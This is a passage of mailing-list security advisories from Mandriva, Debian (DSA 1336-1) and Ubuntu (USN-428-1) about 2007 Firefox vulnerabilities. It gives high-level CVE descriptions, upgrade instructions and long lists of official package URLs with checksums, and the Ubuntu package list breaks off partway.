corporate/4.0/i586/mozilla-firefox-devel-1.5.0.10-0.1.20060mlcs4.i586.rpm 238bf940d1bcbb6fda8931b71f667f72 corporate/4.0/i586/mozilla-firefox-el-1.5.0.10-0.2.20060mlcs4.i586.rpm 447735f0d29fd5e0de6300f6fd045de9 corporate/4.0/i586/mozilla-firefox-es-1.5.0.10-0.2.20060mlcs4.i586.rpm 931eabcf091f4559345608f5392806bf corporate/4.0/i586/mozilla-firefox-es_AR-1.5.0.10-0.2.20060mlcs4.i586.rpm 9fd3a7993810b1b123c3ba91a3a1490f corporate/4.0/i586/mozilla-firefox-eu-1.5.0.10-0.2.20060mlcs4.i586.rpm fd9d51556e2ba94e0ffaf43705f5cab6 corporate/4.0/i586/mozilla-firefox-fi-1.5.0.10-0.2.20060mlcs4.i586.rpm 52adede8af8524b638cd83314aec6266 corporate/4.0/i586/mozilla-firefox-fr-1.5.0.10-0.2.20060mlcs4.i586.rpm 282ae19f5142375fc6e3ad10e967dff9 corporate/4.0/i586/mozilla-firefox-fy-1.5.0.10-0.2.20060mlcs4.i586.rpm 656828e7f2ae5d63cad48aaab33256a4 corporate/4.0/i586/mozilla-firefox-ga-1.5.0.10-0.2.20060mlcs4.i586.rpm fa58146cd153717c41c9451557e999f6 corporate/4.0/i586/mozilla-firefox-gu_IN-1.5.0.10-0.2.20060mlcs4.i586.rpm 17b33ea5ece6d8eaa9517fb3189ec55a corporate/4.0/i586/mozilla-firefox-he-1.5.0.10-0.2.20060mlcs4.i586.rpm 30053a74588d22644b41275b5ce778e1 corporate/4.0/i586/mozilla-firefox-hu-1.5.0.10-0.2.20060mlcs4.i586.rpm 885a9938fcf4959f7f6bdd61bd2ba650 corporate/4.0/i586/mozilla-firefox-it-1.5.0.10-0.2.20060mlcs4.i586.rpm 77e1ac081838a5ac3e8af94cd7a6f498 corporate/4.0/i586/mozilla-firefox-ja-1.5.0.10-0.2.20060mlcs4.i586.rpm e2c5b9a2d2bd30987c17936e23c5e8d8 corporate/4.0/i586/mozilla-firefox-ko-1.5.0.10-0.2.20060mlcs4.i586.rpm 4800b533de6d0f1e546f6dae9a5fb21a corporate/4.0/i586/mozilla-firefox-lt-1.5.0.10-0.2.20060mlcs4.i586.rpm 0931d7d5523c46ac7c973975ca8dad73 corporate/4.0/i586/mozilla-firefox-mk-1.5.0.10-0.2.20060mlcs4.i586.rpm 394080d296f7a239844de8a8b9b7c0c4 corporate/4.0/i586/mozilla-firefox-nb-1.5.0.10-0.2.20060mlcs4.i586.rpm 10d1780b83a3f5d30e1b8b4361ffdfdd corporate/4.0/i586/mozilla-firefox-nl-1.5.0.10-0.2.20060mlcs4.i586.rpm 8b572aedf2e0e16e12723edfcdfae0db corporate/4.0/i586/mozilla-firefox-pa_IN-1.5.0.10-0.2.20060mlcs4.i586.rpm 83b936f9a1c305b79cb0c341f924487c corporate/4.0/i586/mozilla-firefox-pl-1.5.0.10-0.2.20060mlcs4.i586.rpm 19dda1ba52136f6f9142b6258fd997aa corporate/4.0/i586/mozilla-firefox-pt-1.5.0.10-0.2.20060mlcs4.i586.rpm 8a5a3934236c75d1005c10d398f57cbc corporate/4.0/i586/mozilla-firefox-pt_BR-1.5.0.10-0.2.20060mlcs4.i586.rpm 5c0e7463955e0112393e2112b969fbe9 corporate/4.0/i586/mozilla-firefox-ro-1.5.0.10-0.2.20060mlcs4.i586.rpm bc7fd0ab0a70f299b65c04ad8e4fa690 corporate/4.0/i586/mozilla-firefox-ru-1.5.0.10-0.2.20060mlcs4.i586.rpm 234e0d15ab182ab8d19f56b3977d0a44 corporate/4.0/i586/mozilla-firefox-sk-1.5.0.10-0.2.20060mlcs4.i586.rpm e127bce5679ad77353c7322f27dd3b88 corporate/4.0/i586/mozilla-firefox-sl-1.5.0.10-0.2.20060mlcs4.i586.rpm f55d9b802b42c0f96f57303e8592824b corporate/4.0/i586/mozilla-firefox-sv-1.5.0.10-0.2.20060mlcs4.i586.rpm b1a9c031df80ae88b4a356b9af301ed1 corporate/4.0/i586/mozilla-firefox-tr-1.5.0.10-0.2.20060mlcs4.i586.rpm 37b979cd7cce011dfe8aeab993fbb7c1 corporate/4.0/i586/mozilla-firefox-uk-1.5.0.10-0.2.20060mlcs4.i586.rpm baf550b8086fc279abba47078710224e corporate/4.0/i586/mozilla-firefox-zh_CN-1.5.0.10-0.2.20060mlcs4.i586.rpm 7d16f4f417c1863370687e78293bcb9f corporate/4.0/i586/mozilla-firefox-zh_TW-1.5.0.10-0.2.20060mlcs4.i586.rpm 7fccd7db700eb245940aab0124ec4c05 corporate/4.0/SRPMS/mozilla-firefox-1.5.0.10-0.1.20060mlcs4.src.rpm 43ef53c286c5fb8b3f277c0fc0a20df8 corporate/4.0/SRPMS/mozilla-firefox-l10n-1.5.0.10-0.2.20060mlcs4.src.rpm Corporate 4.0/X86_64: 6d13ee022d7fa9c3b5132e0ba82bf3ea corporate/4.0/x86_64/lib64nspr4-1.5.0.10-0.1.20060mlcs4.x86_64.rpm 0490445228499883494da3049cf36b7e corporate/4.0/x86_64/lib64nspr4-devel-1.5.0.10-0.1.20060mlcs4.x86_64.rpm c0e7738ec03a83d2c39a7053c975b1bf corporate/4.0/x86_64/lib64nspr4-static-devel-1.5.0.10-0.1.20060mlcs4.x86_64.rpm 4d9d303f922461f7d4f328bea614db8e corporate/4.0/x86_64/lib64nss3-1.5.0.10-0.1.20060mlcs4.x86_64.rpm 9c3775e48214afc0cd035a06c40d526d corporate/4.0/x86_64/lib64nss3-devel-1.5.0.10-0.1.20060mlcs4.x86_64.rpm f4dc844b4b15c6165ed98a00383cfc24 corporate/4.0/x86_64/mozilla-firefox-1.5.0.10-0.1.20060mlcs4.x86_64.rpm 3b6d11aebb0fd5c1e0f44f2c1600005f corporate/4.0/x86_64/mozilla-firefox-ar-1.5.0.10-0.2.20060mlcs4.x86_64.rpm a3f17246002dee38637799e1c23b5d32 corporate/4.0/x86_64/mozilla-firefox-bg-1.5.0.10-0.2.20060mlcs4.x86_64.rpm 8ecc63eb0d8f791f6cec078df25f55ef corporate/4.0/x86_64/mozilla-firefox-br-1.5.0.10-0.2.20060mlcs4.x86_64.rpm a54acae77a36998a6536050e86948585 corporate/4.0/x86_64/mozilla-firefox-ca-1.5.0.10-0.2.20060mlcs4.x86_64.rpm e30b8dabbffc4e4e179c78d627278a79 corporate/4.0/x86_64/mozilla-firefox-cs-1.5.0.10-0.2.20060mlcs4.x86_64.rpm 6ef3998ac9620fb78acf70f51392496e corporate/4.0/x86_64/mozilla-firefox-da-1.5.0.10-0.2.20060mlcs4.x86_64.rpm 6dac6eb4933dcb84df7fd37c194309e5 corporate/4.0/x86_64/mozilla-firefox-de-1.5.0.10-0.2.20060mlcs4.x86_64.rpm ddba48d3aff4bafb269ee84371e5c384 corporate/4.0/x86_64/mozilla-firefox-devel-1.5.0.10-0.1.20060mlcs4.x86_64.rpm 98b4220ef27043107b322a5cdd421be3 corporate/4.0/x86_64/mozilla-firefox-el-1.5.0.10-0.2.20060mlcs4.x86_64.rpm 106e4bf9040efb15d8fadb61aa5a7c2f corporate/4.0/x86_64/mozilla-firefox-es-1.5.0.10-0.2.20060mlcs4.x86_64.rpm ce661feb49b45a68920c4637c7c13c5c corporate/4.0/x86_64/mozilla-firefox-es_AR-1.5.0.10-0.2.20060mlcs4.x86_64.rpm 132ec96029ffb15384aed5ba812583a1 corporate/4.0/x86_64/mozilla-firefox-eu-1.5.0.10-0.2.20060mlcs4.x86_64.rpm b16cf456819902a14cf94a96ac93181e corporate/4.0/x86_64/mozilla-firefox-fi-1.5.0.10-0.2.20060mlcs4.x86_64.rpm 8e4915d6bb122cd84ce0759b4eca96e4 corporate/4.0/x86_64/mozilla-firefox-fr-1.5.0.10-0.2.20060mlcs4.x86_64.rpm 16ac6ac2049bace795a518d3862ada83 corporate/4.0/x86_64/mozilla-firefox-fy-1.5.0.10-0.2.20060mlcs4.x86_64.rpm 8c0de62ea2b10f6c3c94b08c8e208bd7 corporate/4.0/x86_64/mozilla-firefox-ga-1.5.0.10-0.2.20060mlcs4.x86_64.rpm c183da11469c352f269025c5fc57e012 corporate/4.0/x86_64/mozilla-firefox-gu_IN-1.5.0.10-0.2.20060mlcs4.x86_64.rpm d2816239b3ce0a131eb6f235927bfa4d corporate/4.0/x86_64/mozilla-firefox-he-1.5.0.10-0.2.20060mlcs4.x86_64.rpm 9a8d7e5714f9953adb8c40b528ffdba7 corporate/4.0/x86_64/mozilla-firefox-hu-1.5.0.10-0.2.20060mlcs4.x86_64.rpm db7471b38b44a3aeec57a2f70c256f4e corporate/4.0/x86_64/mozilla-firefox-it-1.5.0.10-0.2.20060mlcs4.x86_64.rpm a1edf7dddc4c57664e9b7c41c29481b4 corporate/4.0/x86_64/mozilla-firefox-ja-1.5.0.10-0.2.20060mlcs4.x86_64.rpm e7d4cca273590d658643af1a0e0a3c3f corporate/4.0/x86_64/mozilla-firefox-ko-1.5.0.10-0.2.20060mlcs4.x86_64.rpm 95e875e933161481817058192705cc55 corporate/4.0/x86_64/mozilla-firefox-lt-1.5.0.10-0.2.20060mlcs4.x86_64.rpm 1b43c856786159cf3f7a59837050401a corporate/4.0/x86_64/mozilla-firefox-mk-1.5.0.10-0.2.20060mlcs4.x86_64.rpm b3e0ea6366409cb297cb4173c5330b40 corporate/4.0/x86_64/mozilla-firefox-nb-1.5.0.10-0.2.20060mlcs4.x86_64.rpm 8a9fbc3f37b7de37336fbcfff054a356 corporate/4.0/x86_64/mozilla-firefox-nl-1.5.0.10-0.2.20060mlcs4.x86_64.rpm 534545b2ec917b51bbf27291c6fa9a3b corporate/4.0/x86_64/mozilla-firefox-pa_IN-1.5.0.10-0.2.20060mlcs4.x86_64.rpm 42e92780667437b6ee60f5820cb97a2b corporate/4.0/x86_64/mozilla-firefox-pl-1.5.0.10-0.2.20060mlcs4.x86_64.rpm 9bd0c9123f63d84e8c3a12f13c19ae9f corporate/4.0/x86_64/mozilla-firefox-pt-1.5.0.10-0.2.20060mlcs4.x86_64.rpm 337773e93570734e94305acf0440f62a corporate/4.0/x86_64/mozilla-firefox-pt_BR-1.5.0.10-0.2.20060mlcs4.x86_64.rpm 703f8acdaad9b0f654c331eb022cbf77 corporate/4.0/x86_64/mozilla-firefox-ro-1.5.0.10-0.2.20060mlcs4.x86_64.rpm 01c25d3eb9f8a06dd6098293c88c2dca corporate/4.0/x86_64/mozilla-firefox-ru-1.5.0.10-0.2.20060mlcs4.x86_64.rpm c1fb6de0b01b4c4907847004b6b2e05a corporate/4.0/x86_64/mozilla-firefox-sk-1.5.0.10-0.2.20060mlcs4.x86_64.rpm db9d491deef9842c9f5e1493dbd996bb corporate/4.0/x86_64/mozilla-firefox-sl-1.5.0.10-0.2.20060mlcs4.x86_64.rpm 2ae15ace7f8137eb7d383a6be838144f corporate/4.0/x86_64/mozilla-firefox-sv-1.5.0.10-0.2.20060mlcs4.x86_64.rpm 6d73f353ff4de75188015f9db657ec86 corporate/4.0/x86_64/mozilla-firefox-tr-1.5.0.10-0.2.20060mlcs4.x86_64.rpm 800864eb5c3d392955c0ccca16469685 corporate/4.0/x86_64/mozilla-firefox-uk-1.5.0.10-0.2.20060mlcs4.x86_64.rpm d2dfe49edd705f89ebcefc1344d610aa corporate/4.0/x86_64/mozilla-firefox-zh_CN-1.5.0.10-0.2.20060mlcs4.x86_64.rpm 9995161554c1d34a4649f7c8ae6519d8 corporate/4.0/x86_64/mozilla-firefox-zh_TW-1.5.0.10-0.2.20060mlcs4.x86_64.rpm 7fccd7db700eb245940aab0124ec4c05 corporate/4.0/SRPMS/mozilla-firefox-1.5.0.10-0.1.20060mlcs4.src.rpm 43ef53c286c5fb8b3f277c0fc0a20df8 corporate/4.0/SRPMS/mozilla-firefox-l10n-1.5.0.10-0.2.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFF5dR+mqjQ0CJFipgRApkQAKCwNIjEhnWrFUJBCVdP+JPYSoXbKQCggnPX ezKR2KERlky8e8I363Sfs3c= =fJ94 -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 1336-1 security@debian.org http://www.debian.org/security/ Moritz Muehlenhoff July 22nd, 2007 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : mozilla-firefox Vulnerability : several Problem-Type : remote Debian-specific: no CVE ID : CVE-2007-1282 CVE-2007-0994 CVE-2007-0995 CVE-2007-0996 CVE-2007-0981 CVE-2007-0008 CVE-2007-0009 CVE-2007-0775 CVE-2007-0778 CVE-2007-0045 CVE-2006-6077 Several remote vulnerabilities have been discovered in Mozilla Firefox. This will be the last security update of Mozilla-based products for the oldstable (sarge) distribution of Debian. We recommend to upgrade to stable (etch) as soon as possible. The Common Vulnerabilities and Exposures project identifies the following vulnerabilities: CVE-2007-1282 It was discovered that an integer overflow in text/enhanced message parsing allows the execution of arbitrary code. CVE-2007-0994 It was discovered that a regression in the Javascript engine allows the execution of Javascript with elevated privileges. CVE-2007-0995 It was discovered that incorrect parsing of invalid HTML characters allows the bypass of content filters. CVE-2007-0996 It was discovered that insecure child frame handling allows cross-site scripting. CVE-2007-0981 It was discovered that Firefox handles URI withs a null byte in the hostname insecurely. CVE-2007-0008 It was discovered that a buffer overflow in the NSS code allows the execution of arbitrary code. CVE-2007-0009 It was discovered that a buffer overflow in the NSS code allows the execution of arbitrary code. CVE-2007-0775 It was discovered that multiple programming errors in the layout engine allow the execution of arbitrary code. CVE-2007-0778 It was discovered that the page cache calculates hashes in an insecure manner. CVE-2006-6077 It was discovered that the password manager allows the disclosure of passwords. For the oldstable distribution (sarge) these problems have been fixed in version 1.0.4-2sarge17. You should upgrade to etch as soon as possible. The stable distribution (etch) isn't affected. These vulnerabilities have been fixed prior to the release of Debian etch. The unstable distribution (sid) no longer contains mozilla-firefox. Iceweasel is already fixed. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge17.dsc Size/MD5 checksum: 1641 36715bb647cb3b7cd117edee90a34bfd http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge17.diff.gz Size/MD5 checksum: 553311 4ba992e60e5c6b156054c5105b1134ae http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4.orig.tar.gz Size/MD5 checksum: 40212297 8e4ba81ad02c7986446d4e54e978409d Alpha architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge17_alpha.deb Size/MD5 checksum: 11221890 5d8d1de73d162edf8ddbaa40844bb454 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge17_alpha.deb Size/MD5 checksum: 172696 42d5c31ec7a2e3163846c347f04773df http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge17_alpha.deb Size/MD5 checksum: 63574 238529b9d4ae396dc01d786d4fb843b4 AMD64 architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge17_amd64.deb Size/MD5 checksum: 9429140 8394fcd85a7218db784160702efc5249 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge17_amd64.deb Size/MD5 checksum: 166496 795a8ec3e1aa1b0a718ad6f4439670ef http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge17_amd64.deb Size/MD5 checksum: 62022 ef315cc90c3780ff151cd2271e913859 ARM architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge17_arm.deb Size/MD5 checksum: 8244544 71eaf9cb5418a77410ff12c7f36eb32b http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge17_arm.deb Size/MD5 checksum: 157966 5e2e22d04a33ccbc0e6b19b4c4d43492 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge17_arm.deb Size/MD5 checksum: 57358 6f34a7a02114e48cadc6860b86f75130 HP Precision architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge17_hppa.deb Size/MD5 checksum: 10301620 3700a0b7dcb0ab061b3521e2a3f232f9 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge17_hppa.deb Size/MD5 checksum: 169432 387b8fa52d406dfdd26c3adc3ccac615 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge17_hppa.deb Size/MD5 checksum: 62500 80addaf2d87b6952fdc9104c5fc9dfde Intel IA-32 architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge17_i386.deb Size/MD5 checksum: 8919924 8fc67257357687c8611b3e4e5389aee4 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge17_i386.deb Size/MD5 checksum: 161684 6c989c4276e34c6031b6185418a8ddb1 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge17_i386.deb Size/MD5 checksum: 58896 7e48aa697c8c17f7d22de860a17e7dfd Intel IA-64 architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge17_ia64.deb Size/MD5 checksum: 11664142 aa008699700ba3c8b45d3a8961e99192 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge17_ia64.deb Size/MD5 checksum: 172030 e79af50f04490de310cda7f6ce652d44 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge17_ia64.deb Size/MD5 checksum: 66718 8cabdbf0919ac447c5d492ef6227d9af Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge17_m68k.deb Size/MD5 checksum: 8196148 e3544446b371fd7ed4b79e53f69b556a http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge17_m68k.deb Size/MD5 checksum: 160556 0164d4c0f675a020643ccedf94a55eb8 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge17_m68k.deb Size/MD5 checksum: 58168 b429907e69e8daa7d51e45552659da27 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge17_mips.deb Size/MD5 checksum: 9954006 0eb0513fc950e7cd8abcae9666b24a7b http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge17_mips.deb Size/MD5 checksum: 159496 ca0585a663a5470d3a62ae0786864beb http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge17_mips.deb Size/MD5 checksum: 59170 22ea96156de56d046a7afd73d4857419 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge17_mipsel.deb Size/MD5 checksum: 9831728 dda6865c7290fce658847f0909617c73 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge17_mipsel.deb Size/MD5 checksum: 159060 e7a7c4db0f5df82f84ceef6827df2bea http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge17_mipsel.deb Size/MD5 checksum: 58984 b0b02ac1c62041db8d377a7ff40c013c PowerPC architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge15_powerpc.deb Size/MD5 checksum: 8587718 8d219ce9e684b86babfe31db9d7d9658 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge15_powerpc.deb Size/MD5 checksum: 159762 41f3707945d5edae6ee1ac90bdef5cab http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge15_powerpc.deb Size/MD5 checksum: 60936 1a79408acd12828a3710393e05d99914 IBM S/390 architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge17_s390.deb Size/MD5 checksum: 9667078 5838d957637b4d4c2c19afea0dd68db5 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge17_s390.deb Size/MD5 checksum: 167092 4dd6de7299014d5e0c13da8e480a7f3c http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge17_s390.deb Size/MD5 checksum: 61472 64d10c667ed4c6c12947c49f5cca8ff6 Sun Sparc architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge17_sparc.deb Size/MD5 checksum: 8680322 241cddabdf91eb14b0a6529ffc84a51d http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge17_sparc.deb Size/MD5 checksum: 160304 7887081b85d3ead3994a997608bbe22a http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge17_sparc.deb Size/MD5 checksum: 57718 4a4eeeb0815cb03d51f74965403911ad These files will probably be moved into the oldstable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFGo5b7Xm3vHE4uyloRAsdgAKDTo6NxeylHh30syJpFeyF5/Yr/XwCdH188 NdI5zd36oN5mVqIDUsqYC3o= =/qY/ -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . =========================================================== Ubuntu Security Notice USN-428-1 February 26, 2007 firefox vulnerabilities CVE-2006-6077, CVE-2007-0008, CVE-2007-0009, CVE-2007-0775, CVE-2007-0776, CVE-2007-0777, CVE-2007-0778, CVE-2007-0779, CVE-2007-0780, CVE-2007-0800, CVE-2007-0981, CVE-2007-0995, CVE-2007-0996, CVE-2007-1092 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: firefox 1.5.dfsg+1.5.0.10-0ubuntu0.5.10.1 Ubuntu 6.06 LTS: firefox 1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1 libnspr4 1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1 libnss3 1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1 Ubuntu 6.10: firefox 2.0.0.2+0dfsg-0ubuntu0.6.10 libnspr4 2.0.0.2+0dfsg-0ubuntu0.6.10 libnss3 2.0.0.2+0dfsg-0ubuntu0.6.10 After a standard system upgrade you need to restart Firefox to effect the necessary changes. Details follow: Several flaws have been found that could be used to perform Cross-site scripting attacks. A malicious web site could exploit these to modify the contents or steal confidential data (such as passwords) from other opened web pages. (CVE-2006-6077, CVE-2007-0780, CVE-2007-0800, CVE-2007-0981, CVE-2007-0995, CVE-2007-0996) The SSLv2 protocol support in the NSS library did not sufficiently check the validity of public keys presented with a SSL certificate. A malicious SSL web site using SSLv2 could potentially exploit this to execute arbitrary code with the user's privileges. (CVE-2007-0008) The SSLv2 protocol support in the NSS library did not sufficiently verify the validity of client master keys presented in an SSL client certificate. (CVE-2007-0775, CVE-2007-0776, CVE-2007-0777, CVE-2007-1092) Two web pages could collide in the disk cache with the result that depending on order loaded the end of the longer document could be appended to the shorter when the shorter one was reloaded from the cache. It is possible a determined hacker could construct a targeted attack to steal some sensitive data from a particular web page. The potential victim would have to be already logged into the targeted service (or be fooled into doing so) and then visit the malicious site. (CVE-2007-0778) David Eckel reported that browser UI elements--such as the host name and security indicators--could be spoofed by using custom cursor images and a specially crafted style sheet. (CVE-2007-0779) Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.10-0ubuntu0.5.10.1.diff.gz Size/MD5: 176831 76744cf2123e13143408e37deb2311c0 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.10-0ubuntu0.5.10.1.dsc Size/MD5: 1063 eac4c86acb16ad4cf85604e5cc9f441c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.10.orig.tar.gz Size/MD5: 44679183 d55d439c238064ddcedb8fabb6089ff2 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dev_1.5.dfsg+1.5.0.10-0ubuntu0.5.10.1_all.deb Size/MD5: 50314 d17e00b536378e1710c918f2b834e513 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/mozilla-firefox_1.5.dfsg+1.5.0.10-0ubuntu0.5.10.1_all.deb Size/MD5: 51208 abdc905b5e3c31c05a427defdc9035bc amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.10-0ubuntu0.5.10.1_amd64.deb Size/MD5: 3167242 01f67e394a7b569df52fd02513712811 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.10-0ubuntu0.5.10.1_amd64.deb Size/MD5: 217230 bc5d29d293abc4665c052c0fc76aef79 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.10-0ubuntu0.5.10.1_amd64.deb Size/MD5: 83544 d7978eba50c0e82d4e3606240e38e3fa http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.10-0ubuntu0.5.10.1_amd64.deb Size/MD5: 10311286 4ea4f615c24ecceae90e7b432ddb5e4a i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.10-0ubuntu0.5.10.1_i386.deb Size/MD5: 3167298 571b158ab384827e881ab52d05c7afcb http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.10-0ubuntu0.5.10.1_i386.deb Size/MD5: 210744 0092218d208b41e1a72b1303a77b3238 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.10-0ubuntu0.5.10.1_i386.deb Size/MD5: 75946 21eda2226572b3c3143f8e4ab8145ba6 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.10-0ubuntu0.5.10.1_i386.deb Size/MD5: 8712048 66138335623748c529c3050084ceadaa powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.10-0ubuntu0.5.10.1_powerpc.deb Size/MD5: 3167330 7cdba77a564720cf82ea475eace3aef5 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.10-0ubuntu0.5.10.1_powerpc.deb Size/MD5: 214166 630d44a2240aa9d8790de3db3e9b05ff http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.10-0ubuntu0.5.10.1_powerpc.deb Size/MD5: 79138 f4b3d39d326f77acde26161d1d66c84b http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.10-0ubuntu0.5.10.1_powerpc.deb Size/MD5: 9899346 9066e6747aa0337985a1f29f4e64cffd sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.10-0ubuntu0.5.10.1_sparc.deb Size/MD5: 3167284 e6726b6ed59b5c083796ae93c6eedc64 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.10-0ubuntu0.5.10.1_sparc.deb Size/MD5: 211730 b1f127d2df48b09c7b404f09754c71be http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.10-0ubuntu0.5.10.1_sparc.deb Size/MD5: 77516 